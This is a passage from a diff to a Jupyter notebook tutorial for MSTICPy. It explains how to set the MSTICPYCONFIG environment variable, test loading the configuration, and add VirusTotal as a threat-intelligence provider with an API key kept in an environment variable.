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"
+    }
+   },
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Setting the path to your msticpyconfig.yaml\n",
+    "\n",
+    "This is a good point to set up an environment variable so that\n",
+    "you can keep a single configuration file in a known location and always\n",
+    "load the same settings. (Of course, you're free to use multiple configs\n",
+    "if you need to use different settings for each notebook folder)\n",
+    "\n",
+    "- decide on a location for your `msticpyconfig.yaml` - this could be in \"~/.msticpyconfig.yaml\" or \"%userprofile%/msticpyconfig.yaml\"\n",
+    "- copy the `msticpyconfig.yaml` file that you just created to this location.\n",
+    "- set the `MSTICPYCONFIG` environment variable to point to that location:\n",
+    "\n",
+    "## Windows\n",
+    "Open **Settings** and navigate to **System**->**About** and click on **Advanced System Settings**\n",
+    "![image.png](attachment:ad05bde6-0765-44de-83f8-d7d6e38030f6.png)\n",
+    "\n",
+    "## Linux\n",
+    "In your .bashrc (or somewhere else convenient) add:\n",
+    "\n",
+    "`export MSTICPYCONFIG=~/.msticpyconfig.yaml`\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Test auto-loading your msticpyconfig.yaml\n",
+    "\n",
+    "- In the cell below replace the \"./msticpyconfig2.yaml\" with the filename\n",
+    "  from the previous step\n",
+    "- Run the cell (Ctrl-Enter or Shift-Enter)\n",
+    "\n",
+    "You should see the settings editor loaded with the settings you created earlier\n",
+    "\n",
+    "> **Note** the environment variable set here is not persistent<br>\n",
+    "> To make this persistent you need to add it to a startup file like\n",
+    "> .bashrc or your Windows registry."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "%env MSTICPYCONFIG=./msticpyconfig2.yaml\n",
+    "mpedit = MpConfigEdit()\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# More Settings\n",
+    "## Adding Threat Intel (TI) Providers\n",
+    "\n",
+    "You will likely want to do lookups of IP Addresses, URLs and other items to check for any Threat Intelligence reports.\n",
+    "To do that you need to add the providers that you want to use. Most TI providers require that you\n",
+    "have an account with them and supply an API key or other authentication items when you connect.\n",
+    "\n",
+    "Most providers have a free use tier (or in cases like AlienVault OTX) are entirely free.\n",
+    "Free tiers for paid providers usually impose a certain number of requests that you\n",
+    "can make in a given time period.\n",
+    "\n",
+    "For account creation, each provider does this slightly differently.\n",
+    "Use the help links in the editor help to find where to go set each of these up.\n",
+    "\n",
+    "Assuming that you have done this, we can configure a provider. Be sure to\n",
+    "store any authentication keys somewhere safe (and memorable).\n",
+    "\n",
+    "We are going to use [VirusTotal](https://www.virustotal.com) (VT) as an example TI Provider.\n",
+    "For this you will need a VirusTotal API key from the \n",
+    "[VirusTotal](https://developers.virustotal.com/v3.0/reference#getting-started) website.<br>\n",
+    "We also support a range of other threat intelligence providers - you can read about this here [MSTICPy TIProviders](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)\n",
+    "<br><br>\n",
+    "Taking VirusTotal as our example.\n",
+    "- Click on the **TI Providers** tab\n",
+    "- Select \"VirusTotal\" from the **New prov** drop-down list\n",
+    "- Click **Add**\n",
+    "\n",
+    "This should show you the values that you need to provide:\n",
+    "- a single item **AuthKey** (this is usually referred to as an \"API Key\"\n",
+    "\n",
+    "You can paste the key into the **Value** field and click the **Save** button.\n",
+    "\n",
+    "You can opt to store the VT AuthKey as an environment variable. This is a bit more secure than \n",
+    "having it laying around in configuration files.\n",
+    "Assuming that you have set you VT key as an environment variable\n",
+    "```bash\n",
+    "set VT_KEY=VGhpcyBzaG91bGQgc2hvdyB5b3UgdGhlIHZhbHVlcyB  (Windows)\n",
+    "export VT_KEY=VGhpcyBzaG91bGQgc2hvdyB5b3UgdGhlIHZhbHVlcyB  (Linux/MAC)\n",
+    "```\n",
+    "Flip the **Storage** radio button to **EnvironmentVar** and type the name of the\n",
+    "variable (`VT_KEY` in our example) into the value box.\n",
+    "\n",
+    "You can also use Azure Key Vault to store secrets like these but we will need to \n",
+    "set up the Key Vault settings before this will work.\n",
+    "\n",
+    "Click the **Save File** button to save your changes."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
